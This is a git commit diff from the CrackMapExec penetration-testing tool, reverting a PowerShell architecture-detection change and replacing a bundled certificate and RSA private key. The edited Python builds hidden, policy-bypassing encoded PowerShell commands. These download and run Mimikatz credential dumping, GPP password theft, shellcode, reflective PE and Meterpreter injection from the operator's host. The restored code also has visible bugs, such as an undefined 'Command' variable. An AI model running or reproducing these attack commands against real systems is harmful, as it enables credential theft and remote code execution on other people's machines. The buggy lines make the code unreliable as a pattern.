Revert "Stole Empires powershell architecture detection code, arch is now detected and handled automatically"

byt3bl33d3r · byt3bl33d3r · commit ade4c12ad433 · 2016-03-11T20:01:42.000-07:00
This reverts commit cd103f5. This is being reverted due to a bug in wmiexec when executing long command strings. Falling back to the old method for now until/if fixed.
diff --git a/certs/crackmapexec.crt b/certs/crackmapexec.crt
@@ -1,18 +1,18 @@
 -----BEGIN CERTIFICATE-----
-MIIC0zCCAbugAwIBAgIJAONQYgM9kvS9MA0GCSqGSIb3DQEBCwUAMAAwHhcNMTYw
-MzA4MDMxMTE0WhcNMjYwMzA2MDMxMTE0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
-AQ8AMIIBCgKCAQEAm8TFNRF/eBnP6nXhvlFTOqeRarNRJQnTbC51elkn/M3m8Mxe
-+el2BTZ1jXxBC9TiXH5lCTBQpkY5A8+8MBD9HaZ2qwiNDkagvwKTnm2l2+1dLQ9H
-cPHwcKvXXI2sJjBF8Mf2YL8v48tdG7KAit9k+U7qvMoKfcbmANLnZ+EU8WbIQ3Ft
-vUs+mxCbCf0XEQKY0qi42QaM9JOk0fvGf3PhCI8g02P+uRzSEH3sAzIi4McwVzo0
-52HRYdUgrisc5YJeaRBVvwDDGRWqSAKsR8JvU12O3T9OznHmlFiu4JyERhFI/yPD
-k60TruuerPhyaEBqw+QO7+yJ8kQjJiUY+HEGiQIDAQABo1AwTjAdBgNVHQ4EFgQU
-z8UZWnwcobCoPA60GQAS3KYatj4wHwYDVR0jBBgwFoAUz8UZWnwcobCoPA60GQAS
-3KYatj4wDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAF8OIIw1YUbgV
-Q9GwNsZvVKd+aXdLwJzJ/2PJKPesW+hyLxVT9SUbPyaf3Gaj1y5bpHsjGL+Vs/XP
-nDYg/zOL2/SCDBoJqQhU57OfEGbItvnjiyU8AdRTRE1fILuVKaHCjI5U84ZBJaHk
-tKxRxdgXGr5nH17MzpCaqgx4IBYsTkj2HSiZs5Fx0dOJx3b2Fshtrim/OKP6JTMh
-9vpRPMHK2W8szjmLwdU66gKDZ0pseajyR5Ckv5mumwX2wsOQG3afNq5u8lAXSmH1
-jBpBke5WM1XZx2mCe2cpq9ECyl1xUOvwjVSw2qxYJVUMLJSI+2FxDUBJQXQgnAp9
-HMOszdEAjQ==
+MIIC0zCCAbugAwIBAgIJAJoXi7tJgXIQMA0GCSqGSIb3DQEBCwUAMAAwHhcNMTUx
+MDE2MTkwMTE0WhcNMjUxMDEzMTkwMTE0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
+AQ8AMIIBCgKCAQEAsIvtOfuJ7TakL8EVH/ku1mXBWnaACfjNdh7ISTlC7oXaRTxe
+WHjGBkmAAWjHIfKRQev0MxFc6PW+GpV5EtAPIN0j3IHyQhNf+4pfNZyBDR6pdPoH
+/d0DonwxZ7chbc+kpbCz3/0pEuZ+cdfqqe2qd7putw55kbGMlInVa0j95C0VSQPv
+RyJa/n8IJZWOHrVX1OzsuZlrBqPoa/ieZaBa4Y2rBvgclVRzw6vmRKFTDCqcARCd
+TfcQ8ga2wD/Cfah4Z6PMT7ZlAHplFZdvCC1bVC077qUpIR4xxn/D/UGSvmQc3ssg
+3pVKGsuqbIb0LLgzMPN4LG2TiHBHpWwS3l4/iwIDAQABo1AwTjAdBgNVHQ4EFgQU
+Q7giuO8Hlv/pMqGMLASC8/uW82owHwYDVR0jBBgwFoAUQ7giuO8Hlv/pMqGMLASC
+8/uW82owDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAGYf7iROqTpkG
+Rl7O7Kf1gwb4LJcsSLSHKqOw76ujOVY4r552ayJLEGhkizXMgE4HuLTAdLFNd+KT
+DyqxCK3GOikx0D/Wl+xgwQWxkNmuOlajDH1aNJp38BS9yFuHm5b8iOWLpgpoHfPU
+9Lj16C3mnXRnKkmXxtg46gB3P1lT1Zv5Nl7o58//D/5/RCoRjZ4m/rfypekszsBZ
+LzWwabf6WKWzwnx9S+tL/pelzMnhjJ83SmpRE0aKGjjw9+COzpnTyDdGSzCXLJM9
+hjuDcReX7yk0o0thkwlu2pY2hA0ZwjAKu0fIZAD9s4QwxqfAnj26ENscd4VJA+Ph
+4lJiTamdpA==
 -----END CERTIFICATE-----
diff --git a/certs/crackmapexec.key b/certs/crackmapexec.key
@@ -1,27 +1,27 @@
 -----BEGIN RSA PRIVATE KEY-----
-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
+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
 -----END RSA PRIVATE KEY-----
diff --git a/core/powershell.py b/core/powershell.py
@@ -2,27 +2,23 @@
 import logging
 import settings
 
-def ps_command(command, mimikatz=False):
+def ps_command(command, arch):
     logging.info('PS command to be encoded: ' + command)
 
     if settings.args.server == 'https':
         logging.info('Disabling certificate checking for the following PS command: ' + command)
         command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + command
 
-    if not mimikatz:
-        # get the correct PowerShell path and set it temporarily to %pspath%
-        triggerCMD = "if %PROCESSOR_ARCHITECTURE%==x86 (set pspath='') else (set pspath=%WinDir%\\syswow64\\windowspowershell\\v1.0\\)&"
-
-        # invoke PowerShell with the appropriate options
-        # triggerCMD += "call %pspath%powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encCMD
-        triggerCMD += ' call %pspath%powershell.exe -NoP -NonI -W Hidden -Enc {}'.format(b64encode(command.encode('UTF-16LE')))
+    if arch == 32:
+        logging.info('Forcing the following command to execute in a 32bit PS process: ' + command)
+        command = '%SystemRoot%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
     
-    else:
-        triggerCMD = 'powershell.exe -NoP -NonI -W Hidden -Enc {}'.format(b64encode(command.encode('UTF-16LE')))
-
-    logging.info('Full PS command: ' + triggerCMD)
+    elif arch == 64 or arch == 'auto':
+        command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
+    
+    logging.info('Full PS command: ' + command)
 
-    return triggerCMD
+    return command
 
 class PowerShell:
 
@@ -33,6 +29,7 @@ class PowerShell:
     def __init__(self, server, localip):
         self.localip = localip
         self.protocol = server
+        self.arch = settings.args.ps_arch
         self.func_name = settings.obfs_func_name
 
     def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'):
@@ -54,7 +51,10 @@ def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'):
                                           addr=self.localip,
                                           katz_command=command)
 
-        return ps_command(command, mimikatz=True)
+        if self.arch == 'auto':
+            return ps_command(command, 64)
+        else:
+            return ps_command(Command, int(self.arch))
 
     def gpp_passwords(self):
         command = """
@@ -73,7 +73,10 @@ def gpp_passwords(self):
                                           port=settings.args.server_port,
                                           addr=self.localip)
 
-        return ps_command(command)
+        if self.arch == 'auto':
+            return ps_command(command, 64)
+        else:
+            return ps_command(Command, int(self.arch))
 
     def powerview(self, command):
 
@@ -93,8 +96,10 @@ def powerview(self, command):
                                           addr=self.localip,
                                           view_command=command)
 
-
-        return ps_command(command, int(self.arch))
+        if self.arch == 'auto':
+            return ps_command(command, 64)
+        else:
+            return ps_command(Command, int(self.arch))
 
     def inject_meterpreter(self):
         #PowerSploit's 3.0 update removed the Meterpreter injection options in Invoke-Shellcode
@@ -125,36 +130,42 @@ def inject_meterpreter(self):
         if settings.args.procid:
             command += " -ProcessID {}".format(settings.args.procid)
 
-        return ps_command(command)
+        if self.arch == 'auto':
+            return ps_command(command, 32)
+        else:
+            return ps_command(Command, int(self.arch))
 
     def inject_shellcode(self):
         command = """
         IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Shellcode.ps1');
         $WebClient = New-Object System.Net.WebClient;
         [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}:{port}/{shellcode}');
         Invoke-{func_name} -Force -Shellcode $bytes""".format(protocol=self.protocol,
-                                                       port=settings.args.server_port,
-                                                       func_name=self.func_name,
-                                                       addr=self.localip,
-                                                       shellcode=settings.args.path.split('/')[-1])
+                                                              port=settings.args.server_port,
+                                                              func_name=self.func_name,
+                                                              addr=self.localip,
+                                                              shellcode=settings.args.path.split('/')[-1])
 
         if settings.args.procid:
             command += " -ProcessID {}".format(settings.args.procid)
 
         command += ';'
 
-        return ps_command(command)
+        if self.arch == 'auto':
+            return ps_command(command, 32)
+        else:
+            return ps_command(Command, int(self.arch))
 
     def inject_exe_dll(self):
         command = """
         IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-ReflectivePEInjection.ps1');
         $WebClient = New-Object System.Net.WebClient;
         [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}:{port}/{pefile}');
         Invoke-{func_name} -PEBytes $bytes""".format(protocol=self.protocol,
-                                              port=settings.args.server_port,
-                                              func_name=self.func_name,
-                                              addr=self.localip,
-                                              pefile=settings.args.path.split('/')[-1])
+                                                     port=settings.args.server_port,
+                                                     func_name=self.func_name,
+                                                     addr=self.localip,
+                                                     pefile=settings.args.path.split('/')[-1])
 
         if settings.args.procid:
             command += " -ProcId {}"
@@ -164,4 +175,7 @@ def inject_exe_dll(self):
 
         command += ';'
 
-        return ps_command(command)
+        if self.arch == 'auto':
+            return ps_command(command, 32)
+        else:
+            return ps_command(Command, int(self.arch))
diff --git a/core/servers/mimikatz.py b/core/servers/mimikatz.py
@@ -11,20 +11,8 @@
 import ssl
 
 func_name = re.compile('CHANGE_ME_HERE')
-
-def strip_powershell_comments(data):
-    """
-    Strip block comments, line comments, empty lines, verbose statements,
-    and debug statements from a PowerShell source file.
-    """
-
-    # strip block comments
-    strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', data)
-
-    # strip blank lines, lines starting with #, and verbose/debug statements
-    strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])
-
-    return strippedCode
+comments  = re.compile('#.+')
+synopsis  = re.compile('<#.+#>')
 
 class MimikatzServer(BaseHTTPRequestHandler):
 
@@ -46,8 +34,9 @@ def do_GET(self):
                 ps_script = script.read()
                 if self.path[1:] != 'powerview.ps1':
                     logging.info('Obfuscating Powershell script')
+                    ps_script = eval(synopsis.sub('', repr(ps_script))) #Removes the synopsys
                     ps_script = func_name.sub(settings.obfs_func_name, ps_script) #Randomizes the function name
-                    ps_script = strip_powershell_comments(ps_script)
+                    ps_script = comments.sub('', ps_script) #Removes the comments
                     #logging.info('Sending the following modified powershell script: {}'.format(ps_script))
                 self.wfile.write(ps_script)
 
diff --git a/crackmapexec.py b/crackmapexec.py
@@ -71,7 +71,6 @@
 parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
 parser.add_argument("--server", choices={'http', 'https'}, default='https', help='Use the selected server (defaults to https)')
 parser.add_argument("--server-port", metavar='PORT', type=int, help='Start the server on the specified port')
-parser.add_argument("--timeout", default=20, type=int, help='Max timeout in seconds of each thread (default: 20)')
 #How much fail can we limit? can we fail at failing to limit? da da da dum
 parser.add_argument("--fail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed per host (default: None)')
 parser.add_argument("--gfail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed globally (default: None)')
@@ -111,6 +110,7 @@
 
 cgroup = parser.add_argument_group("Command Execution", "Options for executing commands")
 cgroup.add_argument('--execm', choices={"wmi", "smbexec", "atexec"}, default="wmi", help="Method to execute the command (default: wmi)")
+cgroup.add_argument('--ps-arch', default='auto', choices={'32', '64', 'auto'}, help='Process architecture all PowerShell code/commands should run in (default: auto)')
 cgroup.add_argument('--no-output', action='store_true', dest='no_output', help='Do not retrieve command output')
 cgroup.add_argument("-x", metavar="COMMAND", dest='command', help="Execute the specified command")
 cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
@@ -282,8 +282,7 @@ def concurrency(targets):
     try:
         pool = Pool(args.threads)
         jobs = [pool.spawn(main_greenlet, str(target)) for target in targets]
-        for job in jobs:
-            job.join(timeout=args.timeout)
+        joinall(jobs)
     except KeyboardInterrupt:
         shutdown(0)
 
